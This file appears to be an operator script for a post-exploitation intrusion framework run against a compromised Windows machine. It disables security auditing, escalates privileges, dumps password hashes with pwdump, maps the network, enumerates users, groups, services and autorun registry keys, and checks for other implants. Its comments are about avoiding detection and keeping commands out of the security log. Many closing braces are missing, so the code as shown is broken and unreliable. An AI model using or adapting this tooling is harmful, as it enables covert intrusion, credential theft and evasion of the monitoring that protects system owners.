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#20070423 - Completely rewritten
#Philosophy: Make a modular as possible. Only thing that should be in Simple are references to other scripts,
#calls to simple plugins, and control structures based on what happens with the commands
@include "UseMarkers.epm";
@include "PerlFunctions.epm";
@echo on;
# Environment Variable to indicate whether Simple has finished
SetEnv ("SIMPLE","FALSE");
# Check Process List AND kick off Process Monitor
`log processlist`;
echo "Starting process monitor:";
if (`monitor processmonitor`) {
echo " STARTED";
} else {
echo " FAILED";
# Check for JUMPUP patch
@echo off;
@echo off;
if( `regquery -hive L -subkey "software\\microsoft\\windows\\currentversion\\uninstall\\KB968537"`) {
echo "***********************************************************************";
echo "* *";
echo "* ALERT *";
echo "* *";
echo "* JUMPUP Patch Found! *";
echo "* *";
echo "* Be sure you know what you can and cannot do. *";
echo "* *";
echo "***********************************************************************";
@echo on;
# Environment Variables
# Set up environment variables for other scripts
`script setEnvs.eps`;
# Run PSP checks
# Audit Section
if(`script disableauditing.eps`) {
#var for use in rest of simple.
bool $auditOff = GetEnv("auditOff");
# Monitors
`script StartMonitors.eps`;
# ProcessDeep
bool $noProcInfo = GetEnv("noProcInfo");
if($noProcInfo) {
echo "Skipping process info due to a security concern. It may get caught!";
} else {
if (prompt "Run process info? *You should run normally run it*") {
`background script processdeep.eps`;
# Elevation Section
if (`script getPrivs.eps`) {
#if the script worked, check to see if we need to try disabling auditing again.
string $temp = GetEnv("auditOff");
string $alp = GetEnv("alreadyPriv");
if (($temp == "FALSE") && ($alp == "false")) {
echo "Detected that you couldn't disable auditing before. Trying again now that you have admin.";
if(`script disableauditing.eps`){
# Check the version of PC
`script checkPCversion.eps`;
# Check the install date
`script checkDate.eps`;
# Show the operator the system version
# Bad implant section
`background script ifthen.eps --default`;
# Remove YAK
#if (prompt "Do you want to check for YAK? (unless you know for sure, say YES.)") {
# `script removeYak.eps`;
#Moved yak check to background. Will pop a notepad window if it is found
echo "\r#########################\rChecking for YAK in the background.\rA window will pop if it is found\r#########################\r";
`background script removeYak2.eps`;
# Machine/network Info Section
`background script hotfixes.eps`;
`script syspath.eps`;
`background script drivercheck.eps`;
if (prompt "Do you want to do a driver list?") {
`script driverlist.eps`;
if (prompt "Do you want to query HKLM\\Software?") {
prompt `background netmap`;
`netbios -local`;
`arp -print`;
bool $noInject = GetEnv("noInject");
if ($noInject) {
echo "Skipping pwdump due to a security concern. It may get caught!";
} else {
ifnot (prompt `background pwdump`) {
string $osMaj = GetEnv("OSMAJOR");
int $osMajint = <int>$osMaj;
if ($osMajInt == 4) {
if (prompt "do you want to run ipconfig on the target?") {
`run -command "ipconfig.exe /all" -redirect ipconfig`;
} else {
ifnot (`script scheduler.eps`) {
# drive info
`script driveInfo.eps`;
# Look for old stuff
`log script cleanDirtyFiles2.eps`;
# User Info Section
if ($auditOff){
if (prompt "Do you want the target services,users,and groups? *** Only run if auditing disabled *** "){
`background services -local`;
`background users -local`;
`background groups -local`;
`background groups -global`;
} else {
echo "Auditing was not disabled. Not getting the target services, users, and groups.";
echo "These commands would likely get logged as Object Accesses in the Security Log.";
# Registry Section
# 15 May 07 - I don't know what the below comments intend.
# TODO: log currentversion\\windows, background the rest
# (make parse them out of the regquery files)
`regquery -hive L -subkey "SYSTEM\\currentcontrolset\\control\\session manager\\power" -value Heuristics`;
`regquery -hive L -subkey "SYSTEM\\currentcontrolset\\services\\tcpip\\parameters\\winsock"`;
`regquery -hive L -subkey "software\\microsoft\\windows nt\\currentversion\\winlogon"`;
`regquery -hive L -subkey "software\\microsoft\\windows nt\\currentversion\\windows"`;
`regquery -hive L -subkey "software\\microsoft\\windows\\currentversion\\run"`;
`regquery -hive L -subkey "software\\microsoft\\windows\\currentversion\\runonce"`;
`regquery -hive L -subkey "software\\microsoft\\windows\\currentversion\\runonceex"`;
`regquery -hive L -subkey "hardware\\description\\system\\centralprocessor" -recursive`;
# Clean up plugins
`background script freeplugins.eps`;
# Get OTHER recurring data
# This script is for anything else that
# needs to be gotten on every op.
# The script should NOT prompt for user
# input because it is backgrounded.
`background script recurring.eps`;
# End Script
SetEnv("SIMPLE", "TRUE");
return true;
# subroutine to check for files
sub checkFile(IN string $filenameToCheck, IN string $pathToCheck)
int $tempSize = 0;
@record on;
`dir "$filenameToCheck" -path "$pathToCheck" -max 0`;
@record off;
@echo off;
$tempSize = GetCmdData("size");
@echo on;
if(defined($tempSize)) {
return TRUE;
return FALSE;